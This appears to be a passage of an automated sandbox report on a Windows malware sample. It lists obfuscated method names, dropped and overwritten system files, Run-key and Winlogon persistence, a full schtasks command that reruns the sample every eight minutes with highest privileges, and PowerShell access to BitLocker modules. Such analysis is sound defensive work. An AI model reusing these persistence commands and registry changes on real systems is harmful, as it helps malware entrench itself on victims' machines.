                            Source: 9XHFe6y4Dj.exe, o02FnsQY07J2MbxjN1l.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'hN8YKiyBqpU', 'QK9YKnM93Ey', 'rZmPumYjWplUX4FOciUa', 'gHGcj8YjtjihBsS8rpT7', 'FF1LKTYjkpcc3UICbabe', 'KyiWS6YjEipU7mtxoRnd', 'TDrfZhYj5ZsFHHNji5GE', 'zN2rCqYjTvmnN9IBuHrR'
                            Source: 9XHFe6y4Dj.exe, XsNrJu0iRjKJLwircBa.csHigh entropy of concatenated method names: 'nBE0I7sUw7', 'UAe6VnYZjt7C0nCfHoMl', 'o27STDYZ2IXFGUKi5BZf', 'cTT4DqYZCniuVQbMSysu', 'rYkMEkYZHDeU6oKVbAEK', 'cQs3veYZWylS5nmNLJLY', 'miv0Qk3iV9', 'mQv0AlHmJl', 'h6b0GhTgJ0', 'kZT0L6K27a'
                            Source: 9XHFe6y4Dj.exe, rSpDJN8tiKMPRm9Sa4U.csHigh entropy of concatenated method names: 'VpN8EIVt6U', 'sS385Usuhx', 'kpn8TrysUs', 'hOJ8fYVbXZ', 'at18XHFulZ', 'W7JTTNYT5QZ9G0Vv96Jo', 'IF8cv7YTTkG0OsNCyq30', 'fhdtOxYTk4k2jnZ2y6s5', 'J70VreYTE03T6n5JkgLb', 'YHBDYFYTfZsaRj2H4j3g'
                            Source: 9XHFe6y4Dj.exe, SBifFIMGBZJDE60hPAM.csHigh entropy of concatenated method names: 'I4diba0bMA', 'nE8iuHSdqy', 'MBIKEEY2fxFS7ROO7dFL', 'Mpv4UNY25lrnlraj5RiB', 'BQkeCUY2TO8g1HGD7cxt', 'vPWP5HY2XMd32bI5sASh', 'pjEUAUY2DLXZmguK8Oeg', 'kDViiFDH2J', 'YWWJ38Y2sBegsyO10QY5', 'XCKnMRY2xK7WmWUr1e06'
                            Source: 9XHFe6y4Dj.exe, JcTtsiKC4LIsaY9EbxG.csHigh entropy of concatenated method names: 'P9X', 'lrtYKSfi6DF', 'imethod_0', 'gNOKHtaNfw', 'HeKJJCYcJBxOfUH43ira', 'Bv4g3HYcz9uuYQiRHgv9', 'y9av0yYm1JCkBOASbISF', 'CqWunvYmYEvddl4cql8o', 'Lnb7CPYmNgVAWuKTLDD6'
                            Source: 9XHFe6y4Dj.exe, W7MyLLl3o2K1seX8Uqm.csHigh entropy of concatenated method names: 'method_0', 'pNhlZlEYfh', 'fjMlcrvau5', 'xo8lmJF7Uj', 'ShIlyOTeee', 'loklVGkBYd', 'znplrQDm8w', 'oSVZnpYk8lCA33icQ1o7', 'DPySxWYkIZqlWw85G9QE', 'kV3kcAYkghpZOZxHMVfV'
                            Source: 9XHFe6y4Dj.exe, f3fkGIocKGDerRIZn1t.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'VDFYp9ldjf5', 'eXKoyBnhIC', 'imethod_0', 'dNsk29Y32Ggivh5BPlwu', 'PIjvv3Y3CoVuctsuZ9Se', 'zSlfKbY3jv2OIIZjZwTT', 'to8nXhY3HhmDUuK9UPuQ'
                            Source: 9XHFe6y4Dj.exe, pehnlj06QiHSkPRxfpT.csHigh entropy of concatenated method names: 'M8509O6Mhn', 'Gbl0S8iwtw', 'LIQTRdYZvVTWcp0EXEPN', 'x2DcxUYZuS3TnVdwCy5L', 'fdMbZMYZMOhKLvTCaajH', 'QpspT4YZOMLrfrablVAi', 'ylkZJgYZeHJbyUXRJVkM', 'u49tn3YZwMjVHU08Yvre', 'Ujv4mtYZib8JChDcFOYF', 'Prkr5jYZnstjFkFJOHju'
                            Source: 9XHFe6y4Dj.exe, h15SPJ4uyJthUNbUclf.csHigh entropy of concatenated method names: 'PycNoTjvZ4m', 'lyxNofP1dpZ', 'hB09dRY4WgxP1Dmp7mBe', 'YrhEZyY4tcXffqC8ONHO', 't2MTc2Y4kVxdnFyMl4OS', 'L0kSV3Y4EQIU3qwpBySP', 'WIAWffY45OKJIBJO6Y0k'
                            Source: 9XHFe6y4Dj.exe, EtktcJpP1naIMJxotas.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'mxkYKhmLPaE', 'yWOYpYaoQ3v', 'Pb43m2Y8AtHy6MIYe2Ca', 'Gv7rlsY8GOso3YIdcbcA', 'aRi6ThY8L9gd4PqZvCMa'
                            Source: 9XHFe6y4Dj.exe, u3Mty4YFL93hAyqdc4J.csHigh entropy of concatenated method names: 'P9X', 'KJwYx0lEZr', 'h9vYK1OIvxZ', 'imethod_0', 'TnFY71ud88', 'FaFRoTYaDRkMtGrewRTA', 'GscZcyYafORqTI9iGOpy', 'Vr97G6YaX74oWJWV98UM', 'kHSPCFYaFxhlmpykIgqI', 'jhnQWaYasICuZ3LrWcuT'
                            Source: 9XHFe6y4Dj.exe, TyQUjMUq2bbg2TvwOt6.csHigh entropy of concatenated method names: 'xCUU3cE20K', 'eAYWpmYdrLAANcw0P1qQ', 'phBXZbYdyfxm0UvbqfBu', 'hPx6ioYdVvBAtuyuKBDv', 'eIiRxvYd2eyxAd5GB85o', 'E94', 'P9X', 'vmethod_0', 'XJvYpnAl5N9', 'cCgYK68BFNO'
                            Source: 9XHFe6y4Dj.exe, Kd9LjY23PlS1BUGOkHd.csHigh entropy of concatenated method names: 'WyD2ZWEwAJ', 'CCQ2ciIbwt', 'BIM2msuFen', 'bId2yc3jYR', 'RWc2VU0AOP', 'o3k2rgRtiO', 'qXh223WOMw', 'H0P2Cog0Wa', 'YB42jPKaGM', 'iqe2HVgtUI'
                            Source: 9XHFe6y4Dj.exe, cqS41bUjwbffCkhLqtt.csHigh entropy of concatenated method names: 'jKkUxoXigY', 'cF7U7Mludu', 'bTvUB0wqHy', 'vkWSnDYZYZneMt4m7Zc8', 'pXsjI0YdzSke1kjrHShZ', 'p5WvA0YZ1IGaKwJUpVfr', 'WfBV1HYZNoBl9keAh3pf', 'A5pUWY7KXg', 'tidUt61hhJ', 'RqTUkB8pA9'
                            Source: 9XHFe6y4Dj.exe, qimCAReovyjdTuVBos.csHigh entropy of concatenated method names: 'ObHcfLOML', 'vYOwoaYl846keBTl3auE', 'EdrpSiYlI7IR8dPAanbB', 'FouYCoYlgTqwfZ9uqwMp', 'l7yiK3cG1', 'i54nblhKa', 'nDsQNREXH', 'MeuAnYNuX', 'muVGLXKYo', 'SygLAVmVn'
                            Source: 9XHFe6y4Dj.exe, i6VjSO0Yf01V1sxi832.csHigh entropy of concatenated method names: 'Mhx0hcR2Q1', 'N8x0pDWFmx', 'Ph10ogMP7N', 'gfPlHkYZULJT1da4FqUr', 'o8rCYKYZpesu1JvDEEJD', 'AUKLDkYZo5GDXw5VKPdB', 'ocUCJLYZ0aFiLG3MdiWP', 'Ap7lERYZKRjhYQJIgpkP', 'OhAQr2YZ69PpKuoaM1G4', 'yIKQSpYZRC7sZxqbZfdW'
                            Source: 9XHFe6y4Dj.exe, VqVjXqrtJyFVxWV4N0Q.csHigh entropy of concatenated method names: 'YQIYKqgoiE5', 'vaprExpxKT', 'bVIr5F8wTA', 'xxRrTv0QgO', 'MbQpV7YFahVdkG65Zu0c', 'F3iyJwYFIkmGlQ7OpIjF', 'COGSwoYFgwwgqtfjkBCs', 'UPkUyVYF8ahOJ3stoAVu', 'wBrVjxYF3clyDPc5AQy6', 'HWRqSTYFdk3YQrgNJgEW'
                            Source: 9XHFe6y4Dj.exe, yFmIOVzxcX5O3cFxwK.csHigh entropy of concatenated method names: 'kHJYYcvWlD', 'swZYhQcINZ', 'k6qYpFHbOw', 'nicYo3wj3q', 'wjYYUVFZHK', 'JQJY07qvJW', 'O5HY6sUOiK', 'EEehR1YaUoJJNXjSxvvm', 'cRZBu1Ya0EZex2dnxs5U', 'HSnTtHYaKr09gCuIaXB5'
                            Source: 9XHFe6y4Dj.exe, F4sIB5hf1s6XR7x1XyR.csHigh entropy of concatenated method names: 'cJtph8fO9h', 'T6fpp3E6Xb', 'lLlpoZUq1y', 'DNn210Y8YCR9U6Iu0hqt', 'hsUAPKY8NOT4vaq5KKlX', 'vWW1yxYgzOOMMcJJL0Qa', 'RUrl3gY8178THf7PeAat', 'YMop9BwYwh', 'KgYgmmY8pBy2nE65GBgt', 'b4wKH5Y8oH4IVXtUUwjs'
                            Source: 9XHFe6y4Dj.exe, FG3G5ox3OK3mZk2lqe2.csHigh entropy of concatenated method names: 'nCfxZZuyc0', 'FvdxcUQsSM', 'hjXxmBLyuI', 'ORmxy1idPT', 'Dispose', 'xVmfGGYBlHJ9dDtZhlim', 'DwCZPFYBqTAYGTEqpjNF', 'Ajh07tYBP9qlMU2poOYr', 'qSiSoCYBaWCbiLJH62SO', 'cxuETSYBIU5oyxwq07BQ'
                            Source: 9XHFe6y4Dj.exe, tiVZ0T4wUHB2hb2JKnh.csHigh entropy of concatenated method names: 'U1Q4gajXT0', 'mGL48nuhfa', 'cA543wlKSt', 'xET4didKpR', 'OyQ4Z7DEdR', 'kt04cau9bL', 'JaB4m1PjkS', 'JTf4yuO3TB', 'dWQ4VVE5n9', 'vBf4rDg59S'
                            Source: 9XHFe6y4Dj.exe, qZEXBcg3xcTMws5yFmP.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: 9XHFe6y4Dj.exe, nQOPnvdQWZGskax9j8V.csHigh entropy of concatenated method names: 'UjdZu2ewMH', 'WBZCAjYf7TQnK1j1kTHO', 'UyoZLuYfsqXA37VLSU4W', 'YHTXb1YfxfAbHJ1IZOeW', 'A3H1ncYfBhGGfstrk97Z', 'kt5', 'X9pdGrmt1w', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                            Source: 9XHFe6y4Dj.exe, KoCmuV42bjP5cVjA3f1.csHigh entropy of concatenated method names: 'XHtYUdkuG5N', 'PwvYUZ62B1Z', 'FRNYUcguKL3', 'gW5YUmxcAWi', 'vBZYUyOnVbG', 'TIlYUVStIXY', 'gqGYUrnsdtq', 'qC2JoYo8tp', 'uDSYU2Mww8i', 'XnsYUCF2rTq'
                            Source: 9XHFe6y4Dj.exe, w56OIlnTPHgQNaYV8IP.csHigh entropy of concatenated method names: 'B24YKO49GBQ', 'AeInXh1t2o', 'lFpYKePGLGL', 'uKYgQBYj8BXapWSCACZx', 'fkLxC9Yj3cRKHbfEyMgL', 'YbChm8YjIbpATVyl16jl', 'TYSgAoYjg4EOc9LwwILc', 'o562fJYjd0FWwi83ufNc', 'poVaocYjZqgZTyWuU76G', 'iHepe8YjcuP2ilJ7uT2U'
                            Source: 9XHFe6y4Dj.exe, Ri3sBVQvCnnJAIy1KNt.csHigh entropy of concatenated method names: 'UDapmsYHLKbNn8dY6um7', 'UkqqdrYHq8iULXSMskrc', 'dr9P2sYHASNNpV7ny46B', 'BjA7c0YHGPuJt0FmkD13', 'method_0', 'method_1', 'UeyQeamSbG', 'RfbQwnepeV', 'MwFQiJBJfk', 'DOBQnct6DH'
                            Source: 9XHFe6y4Dj.exe, UEJ2CViFHBmcnPIaOMD.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'MEyYKb8D3AO', 'GNBYpkUMcDy', 'yHGKNHYClJ024uUqcgif', 'PXkuxrYCavNgwNw1NS5b', 'pRvXi5YCIXFUwWutNhHS', 't7laClYCgP451eBNFE0M', 'Jnmp0BYC85EToLkJ1fm0'
                            Source: 9XHFe6y4Dj.exe, hLVK3U6L9cL7nmWs6H5.csHigh entropy of concatenated method names: 'mWchNrYVydmGIjNPHHGy', 'wdoSd1YVcnTtQPMBIBy5', 'wJ8h9uYVmdWnbyx6N4QL', 'oK59ZlYVVQ63aohYbNTi', 'KvEuJpkDbh', 'mbqiGQYV2HZrpsejPo6s', 'EJ5i3MYVCch81RZHkQlJ', 'QPUpKHYVjl015FuH0soO', 'FtBDymYVHj2kqtT9r6NO', 'm3lMYpibCO'
                            Source: 9XHFe6y4Dj.exe, RFl9fbZftUGU4eKkgds.csHigh entropy of concatenated method names: 'voMZDbT1Gm', 'k6r', 'ueK', 'QH3', 'TaWZFl5IYp', 'Flush', 'D6CZsXAvaP', 'zo9ZxAeQG1', 'Write', 'iVuZ7tGWbL'
                            Source: 9XHFe6y4Dj.exe, m0ppOfajtaIK2icrAFp.csHigh entropy of concatenated method names: 'zdsa4KtDxn', 'f6XazYZDWb', 'NJVaWre2p6', 'kMNatebLgu', 'nfIakwOGss', 'ilNaEtn0RX', 'MBSa5x51rD', 'TCNaTSV8rv', 'HlJafjdysf', 'NDNaXft6rO'
                            Source: 9XHFe6y4Dj.exe, wa6nIYahHoOlxBwYCjW.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'YhbaouA0RQ', 'Write', 'MvEaUUDqB2', 'IaPa0P6qTu', 'Flush', 'vl7'
                            Source: 9XHFe6y4Dj.exe, pqjyY1oX2kqK83hsEYa.csHigh entropy of concatenated method names: 'YvToBJbqOi', 'nTyo40BZAb', 'sijoJevSeL', 'SwVozPNq1t', 'AfUU1uNGbt', 'uJWUYIDnNJ', 'dugUNiZB6p', 'CSfRaaYdSXAuLSEnbNfX', 'NKQV8VYdbT66nTDUvPDL', 'iCyVnsYdRLIZgBPskwNm'
                            Source: 9XHFe6y4Dj.exe, TfmZxSCmDxZwEihILUs.csHigh entropy of concatenated method names: 'ad657IYs7vZYppSuFtZ8', 'ySZHL0YsBcYkKxQSALVJ', 'PbGde9YssMNlYctCB1TM', 'f8tbWVYsxdIxeyE1C7Su', 'TUQERbYsf2Z8cnV5uM9B', 'm5ijqYYsXPuujPfhbHTh', 'BLQ5efYsD9I1HkoAEp7m', 'DBbd5eYs5fYFUgxaweMC', 'bIxoY1YsTQ1jv3srqpqc'
                            Source: 9XHFe6y4Dj.exe, BamFZCsde8NQLA0dZSw.csHigh entropy of concatenated method names: 'eKLsc9ltsi', 'QvZsmBvaW4', 'ng0sy2hkTX', 'wOUsVAnr2t', 'E3gsrxaKE2', 'w3os2ywddK', 'KRnsCLIMuV', 'Mlssjcivki', 'reDsHsy0S9', 'kbRsWFqCeq'
                            Source: 9XHFe6y4Dj.exe, rkdIIHKaPDjjMHdxDwB.csHigh entropy of concatenated method names: 'a5cKgS9uv2', 'xiFK8B2IhT', 'z6cK3nKF11', 'NKOKddDrOX', 'Ke3KZg7I8h', 'BJ6Kc0tF1D', 'Up19YVYcf8t6YNmHqZ2C', 'iVNX2BYcXd9U2R1ZWI0n', 'PpuT7OYcDNapPNEXnf4s', 'Drbt7IYcF8uoa5cg3Mor'
                            Source: 9XHFe6y4Dj.exe, bV5aOkM9iivGpAZApdd.csHigh entropy of concatenated method names: 'Dispose', 'XKIMbbArrv', 'FQGMuFW4Lu', 'nWwMMhM8fW', 'Nvi2tBYV4CfaROg7UQyv', 'hFVG6VYVJamw3vwB7igG', 'Q88SWvYVztcZ5e3cd8Qg', 'CsMjmxYr1lR0ntvDF7UM', 'hOA45PYrYfgcH0NsR6oq'
                            Source: 9XHFe6y4Dj.exe, VySNmjqW4ssxMi0Bbnd.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'vsoqkKVsbE', 'npZqENXMtZ', 'Dispose', 'D31', 'wNK'
                            Source: 9XHFe6y4Dj.exe, y3X7V6NoFkfF5gMSi3o.csHigh entropy of concatenated method names: 'B0JN0wBc3C', 'rC7NKuAo7p', 'vZhN6hWXEs', 'C23NRJLMvl', 'sROOiDYIRC9AqDYKWQwW', 'BLc8DlYIK0Hd1WLavhJI', 'iLo08gYI6xmHeprqg69r', 'BtxrF6YI9chqs5ws6Vqo', 'bsVTVUYISCxPdlwlE3cI', 'u4ORqbYIbJeUAYTiqJxv'
                            Source: 9XHFe6y4Dj.exe, UvRUV13KHsRvdaOQN9u.csHigh entropy of concatenated method names: 'dBC3RgoBwD', 'zW8398C4cK', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'jPP3ScAXUW', 'method_2', 'uc7'
                            Source: 9XHFe6y4Dj.exe, ynDMUr3BTbCseUvMTwM.csHigh entropy of concatenated method names: 'lES3JR7Nld', 'g8u3zsEFhb', 'zMRd1p7RVZ', 'sLodYgc9Ow', 'vRmdNAC8VO', 'VRPdhe0p0s', 'Rpx', 'method_4', 'f6W', 'uL1'
                            Source: 9XHFe6y4Dj.exe, tJtcIM6ulchqUBnncjV.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'oD6ykRYmy0gELVcfxkwL', 'SRIUoBYmVLLffpElrG8A', 'yTYWwxYmrW57H2YJtuLr', 'LnTjutYm2Bev8xYYG88y'
                            Source: 9XHFe6y4Dj.exe, UeFUGvymqoVTmbZPexe.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Y1CAu3YDcy8WNN8BYKK6', 'ckH2kTYDmAmNnDsMrmRO', 'wj582OYDyGCsmmpeQNLb'
                            Source: 9XHFe6y4Dj.exe, s14PV2IDgn1HpG3lrg6.csHigh entropy of concatenated method names: 'BhPIssg2pf', 'PKeIxdMCoF', 'xjVI7ZlVH9', 'Q7DIBnlre3', 'wHbI4nW70D', 'imb99pYExBkV7uaFnrSm', 'K5SH3nYEFvvIcaNxHIev', 'x8yQlZYEsFdIpHZ7y3WL', 'uDrbqxYE7icNAGUG2Zrj', 'V5yp9gYEBrNFinublXHV'
                            Source: 9XHFe6y4Dj.exe, cLstx8nxQlpwx8fXFBV.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'yv4nBCrQgn', 'f0cYKwrs5xs', 'hOggoAYjrW3hTBisuCxp', 'NjmOxcYjycOvkbRDBrsu', 'wwliJGYjVyUDfMqBT84x', 'b79Lk2Yj2lJhkWSnPBva', 'BmIYMvYjCqEgDZ8WSG6L'
                            Source: 9XHFe6y4Dj.exe, DTaRuel9hcU7Yb3eaZx.csHigh entropy of concatenated method names: 'TRklbyLTjR', 'jMDlumEKjA', 'NEVlMdELbX', 'Va0lvCoy1N', 'srvlOKaXqE', 'x0tgWYYknNA0OWvBQ0LR', 'tUGWFUYkwC4Z7gLJoY2I', 'GMv8DRYkiBdoKEBKGpxa', 'xhOVNVYkQmN5PsALtYm8', 'oKSJ6dYkASMcdVPn55MK'

                            Persistence and Installation Behavior

                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: unknown Executable created and started: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File created: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\mcmciRwO.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\TQKWOvbz.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\LmCheCMS.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\taabLgrD.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\jrGLbElV.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ZInvrbgn.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\QZUgHzbG.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\ftgCpYKW.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile created: C:\Users\user\Desktop\XPYNFevp.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\BQsBwRkl.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\fXkmLoaR.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\cmFWEbPY.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\JVSqkWFI.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\PNvPNCKx.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\oXLUJmZB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\ioFvQtnJ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\HyVANeDN.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\ohiUtZsx.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\MlnyqaSB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\bIYNCAnX.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\yHSRySXa.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\OoZhLKXw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\vWmBrFMh.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\AKEAUBbV.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\aZffRVgZ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\xYZkNoRc.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\XjppJZgg.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\FcMrvptI.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\RORqBBDl.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\pSWUxCdp.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile created: C:\Users\user\Desktop\OXbzuEDs.logJump to dropped file

                            Boot Survival

                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
